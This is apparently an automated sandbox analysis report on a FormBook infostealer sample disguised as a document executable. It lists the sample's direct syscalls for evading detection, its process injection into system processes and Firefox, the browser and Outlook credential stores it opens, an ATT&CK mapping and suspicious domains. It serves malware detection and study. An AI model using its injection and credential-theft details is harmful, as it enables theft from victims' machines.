Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03460854 mov eax, dword ptr fs:[00000030h]	3_2_03460854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03434859 mov eax, dword ptr fs:[00000030h]	3_2_03434859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03434859 mov eax, dword ptr fs:[00000030h]	3_2_03434859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034BE872 mov eax, dword ptr fs:[00000030h]	3_2_034BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034BE872 mov eax, dword ptr fs:[00000030h]	3_2_034BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034C6870 mov eax, dword ptr fs:[00000030h]	3_2_034C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034C6870 mov eax, dword ptr fs:[00000030h]	3_2_034C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034BC810 mov eax, dword ptr fs:[00000030h]	3_2_034BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03452835 mov eax, dword ptr fs:[00000030h]	3_2_03452835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03452835 mov eax, dword ptr fs:[00000030h]	3_2_03452835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03452835 mov eax, dword ptr fs:[00000030h]	3_2_03452835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03452835 mov ecx, dword ptr fs:[00000030h]	3_2_03452835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03452835 mov eax, dword ptr fs:[00000030h]	3_2_03452835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03452835 mov eax, dword ptr fs:[00000030h]	3_2_03452835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0346A830 mov eax, dword ptr fs:[00000030h]	3_2_0346A830
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034D483A mov eax, dword ptr fs:[00000030h]	3_2_034D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034D483A mov eax, dword ptr fs:[00000030h]	3_2_034D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0345E8C0 mov eax, dword ptr fs:[00000030h]	3_2_0345E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034FA8E4 mov eax, dword ptr fs:[00000030h]	3_2_034FA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0346C8F9 mov eax, dword ptr fs:[00000030h]	3_2_0346C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0346C8F9 mov eax, dword ptr fs:[00000030h]	3_2_0346C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03430887 mov eax, dword ptr fs:[00000030h]	3_2_03430887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034BC89D mov eax, dword ptr fs:[00000030h]	3_2_034BC89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B4F40 mov eax, dword ptr fs:[00000030h]	3_2_034B4F40

Source: C:\Users\user\Desktop\Document TOP19928.exe

Code function: 0_2_008281F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_008281F7

Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_007FA364 SetUnhandledExceptionFilter,		0_2_007FA364
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_007FA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_007FA395

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	NtAllocateVirtualMemory: Direct from: 0x76EF48EC	Jump to behavior
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	NtQueryAttributesFile: Direct from: 0x76EF2E6C	Jump to behavior
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C	Jump to behavior
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	NtQuerySystemInformation: Direct from: 0x76EF48CC	Jump to behavior
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	NtOpenSection: Direct from: 0x76EF2E0C	Jump to behavior
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	NtDeviceIoControlFile: Direct from: 0x76EF2AEC	Jump to behavior
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2BEC	Jump to behavior
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	NtQueryInformationToken: Direct from: 0x76EF2CAC	Jump to behavior
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	NtCreateFile: Direct from: 0x76EF2FEC	Jump to behavior
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	NtOpenFile: Direct from: 0x76EF2DCC	Jump to behavior
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	NtTerminateThread: Direct from: 0x76EF2FCC	Jump to behavior
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	NtOpenKeyEx: Direct from: 0x76EF2B9C	Jump to behavior
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	NtSetInformationProcess: Direct from: 0x76EF2C5C	Jump to behavior
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	NtProtectVirtualMemory: Direct from: 0x76EF2F9C	Jump to behavior
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	NtWriteVirtualMemory: Direct from: 0x76EF2E3C	Jump to behavior
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	NtNotifyChangeKey: Direct from: 0x76EF3C2C	Jump to behavior
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	NtCreateMutant: Direct from: 0x76EF35CC	Jump to behavior
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	NtResumeThread: Direct from: 0x76EF36AC	Jump to behavior
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	NtMapViewOfSection: Direct from: 0x76EF2D1C	Jump to behavior
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2BFC	Jump to behavior
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	NtQuerySystemInformation: Direct from: 0x76EF2DFC	Jump to behavior
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	NtReadFile: Direct from: 0x76EF2ADC	Jump to behavior
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	NtDelayExecution: Direct from: 0x76EF2DDC	Jump to behavior
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	NtQueryInformationProcess: Direct from: 0x76EF2C26	Jump to behavior
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	NtResumeThread: Direct from: 0x76EF2FBC	Jump to behavior
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	NtCreateUserProcess: Direct from: 0x76EF371C	Jump to behavior
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	NtAllocateVirtualMemory: Direct from: 0x76EF3C9C	Jump to behavior
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	NtWriteVirtualMemory: Direct from: 0x76EF490C	Jump to behavior
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	NtSetInformationThread: Direct from: 0x76EE63F9	Jump to behavior
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	NtClose: Direct from: 0x76EF2B6C
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	NtSetInformationThread: Direct from: 0x76EF2B4C	Jump to behavior
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	NtReadVirtualMemory: Direct from: 0x76EF2E8C	Jump to behavior
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	NtCreateKey: Direct from: 0x76EF2C6C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\netbtugc.exe

Thread register set: target process: 5804

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\netbtugc.exe

Thread APC queued: target process: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\directory\name.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 292D008			Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 2AB7008			Jump to behavior

Source: C:\Users\user\Desktop\Document TOP19928.exe

Code function: 0_2_00828C93 LogonUserW,

0_2_00828C93

Source: C:\Users\user\Desktop\Document TOP19928.exe

Code function: 0_2_007D3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_007D3B4C

Source: C:\Users\user\Desktop\Document TOP19928.exe

Code function: 0_2_007D4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_007D4A35

Source: C:\Users\user\Desktop\Document TOP19928.exe

Code function: 0_2_00834EC9 mouse_event,

0_2_00834EC9

Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Document TOP19928.exe"	Jump to behavior
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\directory\name.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Document TOP19928.exe

0_2_008281F7

Source: C:\Users\user\Desktop\Document TOP19928.exe

Code function: 0_2_00834C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00834C03

Source: Document TOP19928.exe, 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmp, name.exe, 00000002.00000002.2028925844.0000000000885000.00000040.00000001.01000000.00000004.sdmp, name.exe, 00000007.00000002.2177337737.0000000000885000.00000040.00000001.01000000.00000004.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: HAeLffQrBWbBcOffDKoNxdCPr.exe, 00000004.00000002.4477421353.0000000001461000.00000002.00000001.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 00000004.00000000.2093288344.0000000001461000.00000002.00000001.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000000.2253948735.0000000001171000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: Document TOP19928.exe, HAeLffQrBWbBcOffDKoNxdCPr.exe, 00000004.00000002.4477421353.0000000001461000.00000002.00000001.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 00000004.00000000.2093288344.0000000001461000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: HAeLffQrBWbBcOffDKoNxdCPr.exe, 00000004.00000002.4477421353.0000000001461000.00000002.00000001.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 00000004.00000000.2093288344.0000000001461000.00000002.00000001.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000000.2253948735.0000000001171000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: HAeLffQrBWbBcOffDKoNxdCPr.exe, 00000004.00000002.4477421353.0000000001461000.00000002.00000001.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 00000004.00000000.2093288344.0000000001461000.00000002.00000001.00040000.00000000.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000000.2253948735.0000000001171000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\Document TOP19928.exe

Code function: 0_2_007F886B cpuid

0_2_007F886B

Source: C:\Users\user\Desktop\Document TOP19928.exe

Code function: 0_2_008050D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_008050D7

Source: C:\Users\user\Desktop\Document TOP19928.exe

Code function: 0_2_00812230 GetUserNameW,

0_2_00812230

Source: C:\Users\user\Desktop\Document TOP19928.exe

Code function: 0_2_0080418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_0080418A

Source: C:\Users\user\Desktop\Document TOP19928.exe

Code function: 0_2_007D4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_007D4AFE

Source: C:\Users\user\Desktop\Document TOP19928.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2167106350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4479572760.0000000004F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4476573595.0000000002960000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2168438536.0000000003790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2168337085.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4477886533.0000000003050000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4477944173.0000000003090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2233898775.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4477842256.0000000002BA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\netbtugc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: Document TOP19928.exe	Binary or memory string: WIN_81
Source: Document TOP19928.exe	Binary or memory string: WIN_XP
Source: Document TOP19928.exe	Binary or memory string: WIN_XPe
Source: Document TOP19928.exe	Binary or memory string: WIN_VISTA
Source: Document TOP19928.exe	Binary or memory string: WIN_7
Source: Document TOP19928.exe	Binary or memory string: WIN_8
Source: name.exe, 00000007.00000002.2177337737.0000000000885000.00000040.00000001.01000000.00000004.sdmp	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2167106350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4479572760.0000000004F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4476573595.0000000002960000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2168438536.0000000003790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2168337085.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4477886533.0000000003050000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4477944173.0000000003090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2233898775.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4477842256.0000000002BA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_00846596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00846596
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_00846A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00846A5A

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	2 Valid Accounts	2 Native API	111 Scripting	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Valid Accounts	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	2 Registry Run Keys / Startup Folder	2 Valid Accounts	21 Obfuscated Files or Information	NTDS	117 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 Software Packing	LSA Secrets	251 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	1 DLL Side-Loading	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	2 Registry Run Keys / Startup Folder	1 Masquerading	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	2 Valid Accounts	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	2 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	21 Access Token Manipulation	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	412 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Document TOP19928.exe	66%	Virustotal		Browse
Document TOP19928.exe	71%	ReversingLabs	Win32.Trojan.Strab
Document TOP19928.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\directory\name.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\directory\name.exe	71%	ReversingLabs	Win32.Trojan.Strab

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
empowermedeco.com	12%	Virustotal	Browse
www.660danm.top	11%	Virustotal	Browse
shops.myshopify.com	0%	Virustotal	Browse
